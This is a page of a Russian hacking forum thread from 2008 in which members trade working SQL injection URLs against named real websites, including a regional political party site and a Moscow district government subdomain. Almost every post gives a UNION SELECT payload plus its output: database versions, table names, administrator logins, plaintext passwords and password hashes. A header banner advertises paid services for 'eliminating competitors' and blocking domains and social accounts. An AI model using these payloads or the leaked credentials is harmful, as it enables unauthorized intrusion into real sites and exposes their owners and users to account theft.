Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 643 из 1242

643

Опции темы

Поиск в этой теме

Опции просмотра

#6421

24.08.2008, 12:26

mefish

Познающий

Регистрация: 13.04.2008

Сообщений: 42

Провел на форуме:
384537

Репутация: 35

Ну и я немного

Код:

http://www.flirtanica.ru/articles1.php?id=-262+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())/*

4.1.22:wwwflirtanicaru:flirtani@localhost

#6422

24.08.2008, 13:26

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

Провел на форуме:
3009843

Репутация: 204

Код:

http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(user())),unhex(hex(version())),unhex(hex(database())),12,13,14,15,16,17,18,19,20,21/*

uv0001@localhost
4.1.14-log

uv0001_barcelo

#6423

24.08.2008, 14:39

Elvis000

Moderator - Level 7

Регистрация: 23.04.2007

Сообщений: 646

Провел на форуме:
4901399

Репутация: 1035

АвиаБилеты в Москве

www.samoletom.ru

Код:

http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),4,5,6,7,8,9,10/*

samoletom_db@localhost, 5.0.18-log

Таблички нормально перебираются

Код:

http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+16,1/*

#6424

24.08.2008, 14:42

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

avis-tour.ru

Код:

http://www.avis-tour.ru/?action=country&do=1&id=75&page_id=-37+UNION+SELECT+1,2,concat_ws(0x1,id,u_login,u_passwd,u_name,u_active)+from+t_users%20limit%200,1/*

2Julia9410323Julia1
3Adminfrekbyby935Admin0
Админка даж не представляю куда спряталось

#6425

24.08.2008, 15:21

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

http://www.dubkow-muehle.de

Код:

http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--

version() - 5.0.45
user() - ks0114@localhost
database() - ks0114db4

Достаем хэш админа:

Код:

http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users--

#6426

24.08.2008, 17:42

Elephant

Новичок

Регистрация: 31.07.2008

Сообщений: 11

Провел на форуме:
39796

Репутация: -3

Отправить сообщение для Elephant с помощью ICQ

Отправить сообщение для Elephant с помощью MSN

Отправить сообщение для Elephant с помощью Yahoo

Цитата:

Сообщение от 4p3

Раскрутил бы до конца что ли...

http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*

Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)

http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.

Ракрутил с помощью ачатовца)))
А из форума ничё не выудил, а админка стоит огронечитель по IP, обидно блин! хотя взломать то можно, только сплоита под версию того форума я не нашел((((

#6427

25.08.2008, 03:39

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Какая то шляпа..
http://www.abllm.se/?produkt=-1+union+select+1,2,3,4,5,6,7,concat(name,0x3a3a,pa ss),9,10,11,12,13,14,15,16,17,18+from+users+limit+ 4,1

login:goran pass:John6320 http://www.abllm.se/admin/
--------------------------------------------------------------------------------

Тоже Г*** непонятного назначения...
p://www.fraktsidan.se/read.php?id=-1+union+select+1,concat(username,0x3a3a,pass),3,4, 5,6,7,8,9,10,11+from+frakt_users+limit+0,1/*
login:Christer pass:3596

----------------------------------------------------------------
Туси!!!!(co Jaccass)

http://lanpartys.tv/artikel.php?y=&m=-1+union+select+1,concat(password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+from+usr_w eb22_1.np_user+limit+0,1/*

login:admin pass:budsabong

Скули..

#6428

25.08.2008, 05:54

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Скули..

Theplace.ru - трафистый сайт )

Цитата:

http://www.theplace.ru/news/news.php?id=-20142+union+select+1,2,3,table_name,5+from+informa tion_schema.tables/*

5 ветка, таблы..

Цитата:

http://www.theplace.ru/news/news.php?id=-20142+union+select+1,2,3,concat_ws(0x3a,nick,passw d),5+from+busers/*

юзеры.. походу от форума..

Mares.com

Цитата:

http://www.mares.com/events_detail.php?id=-45+union+select+1,2,3,4,table_name,6+from+informat ion_schema.tables+limit+16,1/*

5 версия.. таблы..

Цитата:

http://www.mares.com/events_detail.php?id=-45+union+select+1,password,3,4,username,6+from+use rs+limit+0,1/*

/admin

Fotohoster.ru

Цитата:

http://www.fotohoster.ru/index.php?module=gallery&category=1+or+1=1+and+sub string(version(),1,1)=5

Vstile.ru
Мне домен понравился )

Цитата:

http://vstile.ru/?page_id=-33'+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18/*

Последний раз редактировалось sabe; 25.08.2008 в 06:12..

#6429

25.08.2008, 07:01

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

http://www.er34.ru/

Единая Россия

Код:

http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--

version() - 5.0.51a-log
user() - HST-79811-1@172.16.144.5
database() - HST-79811-1

Админ:

Код:

http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password)+from+jos_users--

login : password

amdin : 99be844677c58d723605ea5a1b558741

P.S: админский логин именно amdin, а не admin.

Расшифровать неполучилось(

Последний раз редактировалось USAkid; 25.08.2008 в 09:40..

#6430

25.08.2008, 09:33

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

Провел на форуме:
3009843

Репутация: 204

Кто там не любит власть?

Код:

http://sao.mos.ru/?r=9_9&cat=16&type=28'

Поддомены

Код:

http://vdeg.sao.mos.ru/news_full.php?id=-16583+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*

4.1.12:sao@chicken:sao

Страница 643 из 1242

643

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход